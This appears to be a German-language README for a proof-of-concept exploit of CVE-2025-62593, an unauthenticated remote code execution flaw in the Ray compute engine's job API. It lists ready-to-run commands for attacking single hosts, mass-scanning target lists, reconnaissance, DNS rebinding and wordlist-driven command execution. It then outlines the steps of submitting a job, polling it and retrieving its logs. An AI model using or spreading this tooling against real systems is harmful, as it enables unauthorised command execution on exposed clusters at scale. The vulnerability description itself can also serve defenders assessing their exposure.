
CVE-2025-62593 — Ray Unauthenticated RCE Exploit ist eine nicht authentifizierte Remote-Codeausführungs-Schwachstelle in der verteilten KI-Compute-Engine Ray.
CVE-2025-62593 ist eine Schwachstelle zur nicht authentifizierten Remote-Codeausführung
in der verteilten KI-Compute-Engine Ray. Die Ursache ist das Fehlen einer
Authentifizierung an kritischen HTTP-Endpunkten (/api/jobs, /api/job_agent/jobs).
Ein Angreifer kann einen Ray-Job einreichen, dessen Entrypoint ein beliebiger Befehl ist,
und diesen auf dem Cluster-Head-Node ausführen.
# Einzelnes Ziel
python3 ray_rce_poc.py --target http://HOST:8265
# Massen-Scan (10 parallel)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json
# Recon-Modus (schnelle Aufzählung)
python3 ray_rce_poc.py --recon --targets list.txt
# DNS-Rebinding-Modus
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1
# Wortlisten-Scan
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv
/api/jobs/ mit Entrypoint, der den Zielbefehl ausführt/api/jobs/ bis der Job einen Endzustand erreicht/api/jobs/{id}/logs zur Wiederherstellung der Ausgabe